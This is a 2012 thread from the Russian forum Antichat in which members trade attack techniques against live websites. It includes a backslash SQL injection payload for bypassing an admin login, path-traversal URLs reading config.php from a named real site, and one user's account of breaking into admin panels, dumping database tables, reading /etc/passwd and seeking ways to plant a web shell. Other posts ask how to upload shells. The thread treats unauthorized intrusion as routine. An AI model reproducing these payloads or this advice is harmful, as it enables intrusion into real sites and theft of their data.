HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20971  
Старый 10.07.2012, 11:23
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию

Цитата:
Сообщение от KeyFound!89  
KeyFound!89 said:
Как обойти фильтрацию кавычки функцией eregi_replace ???
есть такой код:
$val){
$_POST[$var]=trim(eregi_replace("'","''",$val)); // экранит кавычку( вместо одной появляется две
}
...
$rez=mysql_query("select id from admins where admlogin='".$_POST["login"]."' and admpass=password('".$_POST["pass"]."');",$link);
>
логин\пасс вбиваются через форму и шлются POST'OM.
Делаю инъект в логин: login=admin' # & pass=anyparol и тут бы все хорошо, но срабатывающий erig_replace превращает select в такое:
Query select id from admins where admlogin='admin' ' #' and admpass=password('anyparol').
Исходник скрипта у меня есть и я пробовал убирать строку с фильтрацией тогда можно логиниться без пасса! Помагите пожалуйста обойти экранирование!
Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример:

\' union select 111#

получится

select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol')

Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.
 
Ответить с цитированием

  #20972  
Старый 10.07.2012, 11:31
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568

Репутация: 1
По умолчанию

Подскажите, пж-ста:

Есть мини-шелл. Но оказалось, что на сервере allow_url_fopen off. Соответственно, при классической заливке выдает ошибку.

Каким образом можно залить полноценный шел на данный сервер?
 
Ответить с цитированием

  #20973  
Старый 10.07.2012, 14:15
Hapk
Guest
Сообщений: n/a
Провел на форуме:
70690

Репутация: -5
По умолчанию

http://www.swspace.ru/reader/index.php?id=18&page=1'

по чему то дальше не раскрутилась даже через Havij

в чём проблема?
 
Ответить с цитированием

  #20974  
Старый 10.07.2012, 14:20
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от Hapk  
Hapk said:
http://www.swspace.ru/reader/index.php?id=18&page=1'
по чему то дальше не раскрутилась даже через Havij
в чём проблема?
если я не ошибаюсь, то это не скуля...
 
Ответить с цитированием

  #20975  
Старый 10.07.2012, 14:21
Hapk
Guest
Сообщений: n/a
Провел на форуме:
70690

Репутация: -5
По умолчанию

Цитата:
Сообщение от smirk  
smirk said:
если я не ошибаюсь, то это не скуля...
Ну тогда я понимаю что вообще нечего нельзя сделать да?
 
Ответить с цитированием

  #20976  
Старый 10.07.2012, 14:30
mironich
Guest
Сообщений: n/a
Провел на форуме:
142623

Репутация: 19
По умолчанию

Цитата:
Сообщение от Hapk  
Hapk said:
Ну тогда я понимаю что вообще нечего нельзя сделать да?
Этоже LFI а мб и RFI, только хвостик ты врятли из запроса откинешь, поэтому чтение только в текущем котологе, хотя если код не инклюдиться\выполняеться что скорее всего правда, то это просто читалка в тек-щем котологе.
 
Ответить с цитированием

  #20977  
Старый 10.07.2012, 14:46
КOT
Guest
Сообщений: n/a
Провел на форуме:
9872

Репутация: 2
По умолчанию

вот чуток удалось прочитать

http://www.swspace.ru/reader/index.php?id=18&page=../../%00
 
Ответить с цитированием

  #20978  
Старый 10.07.2012, 14:58
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию

Думаю это его больше заинтересует

http://www.swspace.ru/reader/index.php?id=18&page=../../../config.php%00

http://www.swspace.ru/myadmin/
 
Ответить с цитированием

  #20979  
Старый 10.07.2012, 14:59
КOT
Guest
Сообщений: n/a
Провел на форуме:
9872

Репутация: 2
По умолчанию

опа, чоткий! я конфиг в другой папке искал
 
Ответить с цитированием

  #20980  
Старый 10.07.2012, 17:51
KeyFound!89
Guest
Сообщений: n/a
Провел на форуме:
980

Репутация: 0
По умолчанию

Цитата:
Сообщение от .Varius  
.Varius said:
Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример:
\' union select 111#
получится
select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol')
Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.
Спасибо! Я догадался использовать слеш, но уже когда иньектил в pass. В общем там я все раскрутил и получил Remote SQL Injection Authentication Bypass.

Теперь вопросы сложне)):

Через выше указанный SQL Injection Authentication Bypass я получил доступ к двум разным админкам одного ресурса. В одной есть blind-sql, его я даже не стал смотреть руками, сразу отправил в sqlmap, профит есть, все читается\дампиться но очень долго( одну табличку на 30 к записей (2 мб) дампил всю ночь. А там до черта нужных мне таблиц.

Вторая админка - редактор страниц сайта. Весь сайт построен на .shtml и редактировать можно только их. Профита в этом я пока еще не узрел(

Короче нужен шелл, а как закинуть не представляю.

И еще - через blind-sql в первой админке пробовал читать файлы, /etc/passwd читается нормально. Еще раньше я находил на ресурсе ошибки раскрытия системного пути и я знаю структуру папок, пробовал прочитать через инькт конфиги из корня сайта(типо mysql.inc.php), но не тут то было, сайт и бд на разных серваках, а через sql насколько я понимаю читаются те файлы которые на сервере бд, а не на сервере сайта, правильно? А структуру папок сервера бд я не знаю, может есть какие то стандартные пути до конфигов, подскажите. На сервере бд есть например ssh, может можно както стянуть хеши? В общем нужны идеи как полноценно залить шел на сайт, чтобы прочитать конфиг подключения к бд и нормально к ней подключаться, а не извращаться через иньект.

И, да, - логины\хеши пользователей бд я конечно сдампил через иньект, но они неразбиваемые, я прбовал, но в общем то я и так знаю что они там надежные - до 20 символов всякого извращения(

P.S. И еще, как называется уязвимость такого рода: к одному из разделов сайта есть доступ только из внутренней сети (диапазон ip) а я нашел способ проникать туда из обычного инета, как правильно называется тип такой уязвимости?

P.S.S. Я только учусь... Кстати: ищу Сенсея! Готов работать без еды и отдыха, только направляйте по пути истинного дзена
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ